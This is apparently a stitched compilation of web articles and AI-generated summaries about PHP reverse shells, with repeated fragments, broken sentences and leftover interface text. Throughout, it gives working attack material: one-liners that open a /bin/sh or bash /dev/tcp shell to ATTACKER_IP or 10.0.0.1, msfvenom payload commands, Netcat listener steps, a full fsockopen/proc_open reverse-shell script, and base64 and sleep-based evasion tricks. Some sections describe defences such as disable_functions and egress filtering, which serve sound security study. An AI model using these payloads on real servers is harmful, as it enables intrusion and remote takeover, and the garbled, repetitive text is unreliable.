PHP reverse shell is a script executed on a target web server that initiates an outbound connection to an attacker's machine, providing an interactive command-line interface. This technique is highly effective for bypassing firewalls that block incoming connections but allow outgoing traffic. Top PHP Reverse Shell Methods
These methods range from simple one-liners to sophisticated scripts designed to maintain stability. 1. The Pentestmonkey Classic (Most Reliable) Pentestmonkey PHP Reverse Shell is the industry standard for Linux targets. It uses to create a stable, interactive shell session. Key Benefit:
Handles standard input, output, and error streams robustly, allowing for interactive programs like variables in the script. Upload the file to the target web server. Access the file via a web browser or to trigger the shell. 2. Native PHP Socket One-Liners
For quick execution when file upload isn't possible, use a one-liner via a PHP command injection vulnerability.
Bypassed! and uploaded a sweet reverse shell | by Ajay Sharma 5 Sept 2021 —
2.2. Essential PHP Functions Used
| Function | Purpose |
|----------|---------|
| fsockopen() | Open TCP socket connection to attacker |
| pfsockopen() | Persistent version of fsockopen |
| socket_create() | Low-level socket creation |
| exec(), system() | Execute OS commands |
| proc_open() | Advanced process control (with pipes) |
| die() or exit() | Terminate script if connection fails |
| fwrite() / fread() | Read/write over socket |
| shell_exec() | Return command output as string |
Appendix B: Useful Tools
- Generate payloads:
msfvenom -p php/meterpreter_reverse_tcp LHOST=x.x.x.x LPORT=4444 -o shell.php
- Listener management:
nc, socat, metasploit (exploit/multi/handler)
- Obfuscation:
weir, PHP Obfuscator
- Detection:
yara rules for reverse shells, php-malware-finder
Document ID: INFOSEC-PHP-REVSHELL-2025
Version: 1.0
Classification: Public (Educational/Defensive)
This report is for authorized security testing and defensive purposes only.
In the context of cybersecurity and penetration testing, a PHP reverse shell
is a script that forces a target server to initiate a connection back to an attacker's machine, providing a command-line interface on the server. HighOn.Coffee Top PHP Reverse Shell Implementations pentestmonkey/php-reverse-shell - GitHub
php-reverse-shell * Resources. Readme. * Stars. 2.8k stars. * Watchers. 48 watching. * Forks. 1.9k forks. flozz/p0wny-shell: Single-file PHP shell - GitHub
A PHP reverse shell is a script used during penetration testing to gain remote command-line access to a target server. When a web application allows a user to upload or execute PHP code, an attacker can trigger a reverse shell to force the server to initiate an outgoing connection to their own machine. This method is often preferred over a "bind shell" because outgoing connections are less likely to be blocked by firewalls.
The most common way to implement a PHP reverse shell is by using the fsockopen function. This function establishes a network connection to a specific IP address and port where the attacker is listening. Once the connection is successful, the script redirects the server’s standard input, output, and error streams to the network socket. This allows the attacker to type commands into their local terminal and see the results executed on the remote server in real-time.
To use a reverse shell, the practitioner first sets up a listener on their local machine. A common tool for this is Netcat, using a command like nc -lvnp 4444. This command tells the local machine to wait for an incoming connection on port 4444. Once the listener is active, the PHP script is executed on the target web server. The server then reaches out to the attacker's IP, completing the "reverse" connection and providing a shell prompt.
From a defensive perspective, protecting against PHP reverse shells requires a multi-layered approach. System administrators should disable dangerous PHP functions such as exec, shell_exec, system, and passthru in the php.ini configuration file. Additionally, implementing strict file upload validations and using a Web Application Firewall (WAF) can prevent the initial injection of the malicious script. Finally, configuring outbound firewall rules to block unexpected connections from the web server can stop a reverse shell even if the script is successfully executed.
A PHP reverse shell is a script that, when executed on a target server, initiates a TCP connection back to an attacker's machine, providing a remote command-line interface. Top PHP Reverse Shell Tools & Methods
Pentestmonkey's PHP Reverse Shell: This is the industry-standard script used for Linux-based targets. It is highly reliable and handles daemonization to ensure the connection persists even if the initial web request times out.
Ivan Sincek's PHP Reverse Shell: A modern, feature-rich version that supports both Linux and Windows. It includes web shell variants for situations where a full reverse shell is blocked by firewalls.
PHP One-Liners: Ideal for quick exploitation through command injection vulnerabilities.
Example: php -r '$sock=fsockopen("ATTACKER_IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'.
Msfvenom Payloads: Part of the Metasploit Framework, msfvenom can generate obfuscated PHP payloads that are harder for antivirus to detect.
Command: msfvenom -p php/reverse_php LHOST=ATTACKER_IP LPORT=PORT > shell.php. Standard Implementation Procedure
Preparation: Edit the chosen script (like Pentestmonkey's) to include your listening IP address and port.
Listener Setup: Start a listener on your machine to "catch" the connection using a tool like Netcat. Command: nc -lvnp
Deployment: Upload the .php file to the target server, typically via a file upload vulnerability or a Remote Code Execution (RCE) flaw.
Execution: Access the uploaded file via a web browser (e.g., http://target.com). This triggers the script to connect back to your listener, granting you a shell. Detection and Prevention
Ingress Filtering: Implement strict file upload controls, such as whitelisting only safe extensions (e.g., .jpg, .png) and scanning uploaded files for malicious signatures.
Egress Filtering: Configure firewalls to block unauthorized outbound connections from web servers to the internet.
Disable Risky Functions: In the php.ini file, use the disable_functions directive to block functions often used by shells, such as exec(), shell_exec(), system(), and passthru().
Monitoring: Use security tools like Wiz or Invicti to detect unusual process spawning (e.g., www-data starting /bin/sh). Reverse Shell - Invicti
In the world of cybersecurity, a PHP Reverse Shell is a classic "connect-back" technique used by penetration testers (and unfortunately, bad actors) to gain remote command-line access to a web server. Unlike a standard connection where you "call" the server, a reverse shell forces the server to "call" you. The "Anatomy" of the Attack The story usually begins with an unrestricted file upload vulnerability The Entry Point
: An attacker finds a spot on a website—like a profile picture uploader or a resume submission form—that doesn't properly check what kind of file is being uploaded. The Payload
: Instead of a JPG or a PDF, the attacker uploads a script like the famous PentestMonkey PHP Reverse Shell Ivan Sincek’s version The Listener
: On their own machine, the attacker starts a "listener" (usually via a tool like Netcat) to wait for an incoming connection. The Execution
: The attacker navigates to the URL where their file was uploaded (e.g., ://website.com
). The server executes the PHP code, which opens a socket and sends a command prompt back to the attacker’s machine. Popular PHP Reverse Shell "Top" Picks
If you are looking for the most reliable scripts used in the industry for educational and ethical testing: PentestMonkey’s PHP Reverse Shell
: Often considered the "gold standard," this script is included in the default Kali Linux web shells directory ( /usr/share/webshells/php/ Ivan Sincek’s PHP Reverse Shell
: A modern, high-quality version that supports newer PHP versions (5.0+) and works across Linux, macOS, and even Windows. The One-Liner
: For quick execution when you have a tiny command injection window, this tiny snippet is a go-to:
php -r '$sock=fsockopen("ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");' Real-World Story: The Student Hacker
In a notable recent case from late 2025, security researchers identified a trend of "webshell underground" markets. One specific hacker, a student in Bangladesh, was reportedly using PHP backdoors to compromise WordPress and cPanel instances, selling access to these sites to pay for his education.
Bypassed! and uploaded a sweet reverse shell | by Ajay Sharma
Introduction reverse shell is a type of shell session where the target machine initiates a connection back to the attacking machine. Unlike a traditional bind shell, where an attacker connects to a listening port on the server, a reverse shell "reverses" the roles to bypass Network Address Translation (IP masquerading)
that typically block incoming connections but allow outgoing traffic. In the context of PHP, these scripts are common tools used by penetration testers to gain interactive access to a web server after discovering a file upload vulnerability or a remote code execution (RCE) flaw. How PHP Reverse Shells Work
The core logic of a PHP reverse shell involves three main steps: Socket Creation:
The script creates a network socket pointing to the attacker’s IP address and a specific port (e.g., 4444). Process Execution: The script spawns a shell process (like on Linux or on Windows) using PHP functions like shell_exec() proc_open() I/O Redirection:
The script pipes the input from the network socket into the shell’s standard input (STDIN) and sends the shell’s output (STDOUT/STDERR) back through the socket to the attacker. Popular Techniques and "Top" Implementations
Several "top" or industry-standard scripts are frequently used in security auditing: The PentestMonkey Script: This is perhaps the most famous PHP reverse shell. It uses
to create a robust bidirectional stream. It is highly reliable on Linux systems because it handles file descriptors manually to ensure the connection remains stable. The One-Liner:
For quick exploitation where space is limited, attackers use condensed commands. A common example uses to call a system-level tool like
, effectively using PHP as a bridge to execute a native reverse shell command. The Ivan Suchkov Script:
A more modern, streamlined version of the classic reverse shell that focuses on simplicity and compatibility with various PHP versions. Security Implications and Defense
The existence of these scripts highlights a critical security risk: if a web application allows an unauthorized user to execute PHP code, the entire server is compromised. To defend against these attacks, administrators should: Disable Dangerous Functions: disable_functions directive in to block functions like shell_exec Egress Filtering:
Configure firewalls to block all outgoing connections from the web server except to known, necessary services (like a database or an update server). Input Validation:
Ensure that file upload forms and URL parameters are strictly validated to prevent the initial injection of the malicious script. Conclusion
While "reverse shell php" is a term often associated with malicious activity, understanding how these scripts function is vital for cybersecurity professionals
. By mastering the mechanics of how PHP interacts with the underlying operating system, developers and sysadmins can build more resilient environments and better detect the early signs of a breach. specific PHP functions most commonly used to initiate these connections?
A PHP reverse shell is a critical tool in a penetration tester's arsenal, used to gain interactive command-line access to a server after exploiting a vulnerability like file upload or Remote Code Execution (RCE). Unlike a bind shell, which opens a port on the victim and waits for you to connect, a reverse shell forces the target to initiate an outbound connection to your listener, effectively bypassing most inbound firewall rules. Top PHP Reverse Shell Scripts and Techniques
Below are the most widely used and reliable PHP reverse shell methods in 2026. 1. The Classic "PentestMonkey" Script
The PentestMonkey PHP Reverse Shell remains the gold standard for full-featured PHP shells.
Best For: Stability and interactive features on Linux systems.
How it Works: It uses proc_open to spawn a shell and fsockopen to establish a TCP connection back to the attacker.
Key Advantage: It allows for interactive programs like ssh or su once established. 2. Ivan-Sincek's Modern Variant
This is a refined version of the original PentestMonkey script.
Key Updates: It automatically detects the underlying operating system, supporting Linux, macOS, and Windows (using cmd.exe).
Compatibility: Tested on modern PHP versions (7.x and 8.x) and various environments like XAMPP and Docker. 3. Lightweight One-Liners
When you have limited injection space, one-liners are essential.
System Call One-Liner:& /dev/tcp/ATTACKER_IP/PORT 0>&1'"); ?>This uses the native system shell to pipe a bash connection back to you.
fsockopen Minimalist:A shorter script that manually redirects stdin, stdout, and stderr to a socket connection. 4. PHP Remote Shell (Full Suite)
For persistent access, PHP Remote Shell functions like a "Swiss army knife".
Features: Includes a reverse shell, full file browser, and the ability to execute SQL or LDAP code.
Stealth: Uses only POST requests and inline data for images to remain as quiet as possible during an engagement. How to Use a PHP Reverse Shell
To successfully execute a reverse shell, you must follow these three core steps: PHP Web Shell and Reverse Shell Techniques for Linux
This paper examines the mechanisms, execution, and mitigation of PHP-based reverse shells
, a critical technique used in penetration testing and cyberattacks to gain interactive command-line access to web servers.
PHP reverse shells are scripts that, when executed on a target server, initiate an outbound connection to an attacker's machine, effectively bypassing traditional firewall restrictions on inbound traffic. This paper details the technical workflow of these shells, provides common payload examples, and explores defensive strategies for system administrators. 1. Introduction to Reverse Shells reverse shell
(or "connect-back shell") occurs when a compromised system initiates an outbound TCP connection to a listener. Unlike a bind shell
, where the attacker connects to an open port on the target, the reverse shell forces the target to reach out to the attacker. Primary Advantage
: It circumvents Network Address Translation (NAT) and firewalls that typically block incoming connections but permit outgoing traffic on common ports like 80 (HTTP) or 443 (HTTPS). 2. Technical Workflow of a PHP Reverse Shell
The execution of a PHP reverse shell generally follows these five steps: Reverse Shell - Invicti
Top PHP Reverse Shell Scripts for Penetration Testing (2026)
A reverse shell is a critical post-exploitation tool used during authorized security assessments to establish an interactive command session from a compromised target back to an attacker's machine. In 2026, PHP remains a primary target for these shells due to its prevalence in web servers and the frequent discovery of file upload vulnerabilities.
Below are the most reliable and widely used PHP reverse shell techniques and scripts for ethical hacking. 1. Pentestmonkey PHP Reverse Shell (The Classic)
The Pentestmonkey PHP script is the industry standard for web-based exploitation.
Reliability: High; it uses low-level socket functions and includes error handling for various server configurations.
Usage: Best used when you have a file upload vulnerability and can execute the script by navigating to its URL.
Setup: Modify the $ip and $port variables in the script to point to your listener before uploading. 2. Ivan-Sincek PHP Reverse Shell (Modern & Multi-OS)
For modern environments, Ivan-Sincek's reverse shell provides a more robust alternative.
Reverse Shell in PHP: A Review
A reverse shell is a type of shell that allows an attacker to access a victim's machine from a remote location, often used in penetration testing and malicious activities. In this review, we'll focus on creating a reverse shell using PHP.
What is a Reverse Shell?
A reverse shell is a shell that runs on a victim's machine, connecting back to the attacker's machine, allowing the attacker to execute commands, access files, and perform other malicious activities.
PHP Reverse Shell
To create a reverse shell in PHP, we'll use the following components:
- Netcat: A popular networking tool that can be used to establish a reverse shell.
- PHP: The server-side scripting language that will be used to execute the reverse shell.
Basic PHP Reverse Shell Code
Here's a basic example of a PHP reverse shell code:
<?php
$host = 'attacker_ip';
$port = 1234;
$sock = fsockopen($host, $port, $errno, $errstr, 30);
if (!$sock)
die('Could not connect to ' . $host . ':' . $port);
stream_set_blocking($sock, 0);
$shell = array(
'stdin' => $sock,
'stdout' => $sock,
'stderr' => $sock
);
proc_open('bash', $shell, $shell);
fclose($sock);
?>
How it Works
- The code establishes a connection to the attacker's machine (
attacker_ip) on a specified port (1234) using fsockopen.
- The
stream_set_blocking function is used to set the socket to non-blocking mode.
- The
proc_open function is used to execute a new process (bash) with the socket as its standard input, output, and error streams.
- The
fclose function is used to close the socket.
Detection and Prevention
To detect and prevent PHP reverse shells, consider the following:
- Monitor network traffic: Use network monitoring tools to detect suspicious outgoing connections.
- Implement a Web Application Firewall (WAF): A WAF can help detect and block suspicious PHP code.
- Keep PHP and system software up-to-date: Ensure that PHP and system software are updated with the latest security patches.
- Use secure coding practices: Use secure coding practices, such as validating user input and using prepared statements.
Top Tools for Detecting and Preventing Reverse Shells
Some top tools for detecting and preventing reverse shells include:
- OSSEC: A host-based intrusion detection system that can detect suspicious network activity.
- Burp Suite: A web application testing tool that can help detect and prevent reverse shells.
- Snort: A network intrusion prevention system that can detect suspicious network activity.
Conclusion
In conclusion, creating a reverse shell in PHP can be a useful tool for penetration testing and legitimate security testing. However, it's essential to use such tools responsibly and with caution. To detect and prevent reverse shells, consider monitoring network traffic, implementing a WAF, keeping software up-to-date, and using secure coding practices.
In the world of penetration testing and ethical hacking, a PHP reverse shell is a common post-exploitation technique used to gain remote command execution on a target server. Instead of the attacker connecting to the server (which is often blocked by firewalls), the compromised server "calls home" to the attacker's machine. Top PHP Reverse Shell Scripts & Payloads
The "top" choices in this category are defined by their reliability, features, and how easily they can be deployed.
PentestMonkey's PHP Reverse Shell: Widely considered the industry standard. It is a full-featured script that handles interactive programs (like su or ssh) much better than basic one-liners.
Ivan-Sincek's Enhanced Reverse Shell: A modernized version of the original PentestMonkey script that includes auto-detection for Windows (cmd.exe) and Linux (/bin/sh) environments.
PHPBash: Not a traditional reverse shell, but a semi-interactive web shell that mimics a terminal interface in the browser—useful when outbound connections are strictly blocked.
The One-Liner (fsockopen): A minimal payload used for quick execution via a command injection vulnerability:
php -r '$sock=fsockopen("ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");' Use code with caution. Copied to clipboard How It Works pentestmonkey/php-reverse-shell - GitHub
php-reverse-shell * Resources. Readme. * Stars. 2.8k stars. * Watchers. 48 watching. * Forks. 1.9k forks. ivan-sincek/php-reverse-shell - GitHub
Understanding PHP Reverse Shells: Mechanisms, Security Risks, and Best Practices
In the realm of cybersecurity and penetration testing, a PHP reverse shell is one of the most common and effective tools for gaining remote access to a web server. Whether you are a security professional performing a sanctioned audit or a developer looking to harden your infrastructure, understanding how these scripts work is crucial for modern web defense.
This article explores what makes a PHP reverse shell effective, the top methods used by professionals, and how to protect your systems from unauthorized execution. What is a PHP Reverse Shell?
A reverse shell is a type of connection where the target machine (the server) initiates a connection back to the attacker's machine (the listener).
In a standard shell connection (like SSH), you connect to the server. However, firewalls usually block incoming connections on uncommon ports. A reverse shell bypasses this by sending traffic outbound to the attacker. Since most firewalls allow outgoing web traffic (typically over ports 80 or 443), this method is highly successful at establishing a command-line interface on the target. Top PHP Reverse Shell Methods
When searching for the "top" PHP reverse shell, the choice usually depends on the environment and the level of stealth required. Here are the most prominent methods used today: 1. The Pentestmonkey Classic
The script by Pentestmonkey is widely considered the industry standard. It is a robust, feature-rich PHP script that handles file descriptors and process forking to create a stable interactive shell. Pros: Highly stable, works on most Linux/Unix environments. Cons: Large file size (easier for Antivirus/EDR to detect). 2. The One-Liner (Exec/System)
For quick execution or when space is limited (such as in a URL parameter), a PHP one-liner is the go-to. It uses built-in PHP functions to execute shell commands directly.
& /dev/tcp/10.0.0.1/4444 0>&1'"); ?> Use code with caution.
Pros: Minimal footprint, easy to inject into existing files.
Cons: Heavily reliant on the system having bash or nc installed. 3. Web Shells (p0wny-shell)
While technically a "web shell" rather than a pure reverse shell, tools like p0wny-shell provide a terminal-like interface directly in the browser. This is useful if outbound connections are strictly blocked. How it Works: The Connection Process
To successfully deploy a reverse shell, two things must happen:
The Listener: The attacker sets up a listener to catch the incoming connection. This is most commonly done using Netcat:nc -lvnp 4444
The Execution: The PHP script is uploaded to the web server (often via an insecure file upload or local file inclusion vulnerability) and executed by navigating to its URL.
Once executed, the PHP script connects to the listener's IP, providing the attacker with a terminal prompt running under the permissions of the web user (e.g., www-data or apache). How to Detect and Prevent PHP Reverse Shells
Because PHP reverse shells are so effective, they are a primary target for security software. Here is how you can defend your server: 1. Disable Dangerous Functions
Most reverse shells rely on a handful of PHP functions. If your application doesn't need them, disable them in your php.ini file:
disable_functions = exec,shell_exec,system,passthru,popen,proc_open Use code with caution. 2. File Upload Security
Never trust user-supplied files. If your site allows uploads:
Rename files upon upload to prevent execution (e.g., change shell.php to shell.php.txt). Store uploads outside the web root.
Use a whitelist for allowed file extensions (e.g., .jpg, .pdf only). 3. Network Egress Filtering
Limit the ports your server can use to talk to the outside world. A web server generally has no reason to initiate an outbound connection on port 4444. Strict egress (outbound) firewall rules can kill a reverse shell before it starts. 4. Use an EDR or WAF
Modern Endpoint Detection and Response (EDR) tools and Web Application Firewalls (WAF) can identify the signatures of famous scripts like Pentestmonkey or recognize the "reverse connection" behavior and terminate the process automatically. Conclusion
The PHP reverse shell remains a "top" tool in the hacker's arsenal because of PHP's ubiquity on the web. While these scripts are invaluable for legitimate penetration testing, they serve as a reminder of why secure coding and server hardening are non-negotiable. By disabling dangerous functions and monitoring outbound traffic, you can significantly reduce your attack surface.
ini file specifically to prevent these types of remote execution attacks?
Creating a reverse shell in PHP can be an interesting learning experience, particularly for those diving into web application security and penetration testing. A reverse shell is a type of shell where the target machine (often referred to as the "zombie") initiates a connection back to the attacker, allowing the attacker to access the target's command line interface. This technique is commonly used to bypass firewalls and network access controls that block incoming connections.
6.2. Using base64_encode() to Avoid Static Signatures
$cmd = base64_decode("c3lzdGVt"); // "system"
$cmd($_GET['c']);
2. The "One-Liners" (For RCE Exploits)
Sometimes you cannot upload a file. instead, you have a single input field vulnerable to Remote Code Execution (RCE) or an LFI filter that allows PHP input wrappers. You need a compact payload that fits on one line.
Here are the most common functional one-liners. Ensure you change the IP and Port.
Using exec:
php -r '$sock=fsockopen("10.0.0.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
Using bash -c (The TCP Redirection):
This is useful if fsockopen is disabled but bash is available.
php -r '$sock=fsockopen("10.0.0.1",4444);shell_exec("/bin/bash -i >& /dev/tcp/10.0.0.1/4444 0>&1");'
Note: In a URL-encoded scenario (like a GET request), remember to replace spaces with + or %20 and quotes accordingly.
6.7. Time-Based Evasion (Sleep)
Delay execution to evade sandboxes:
sleep(rand(5, 20));
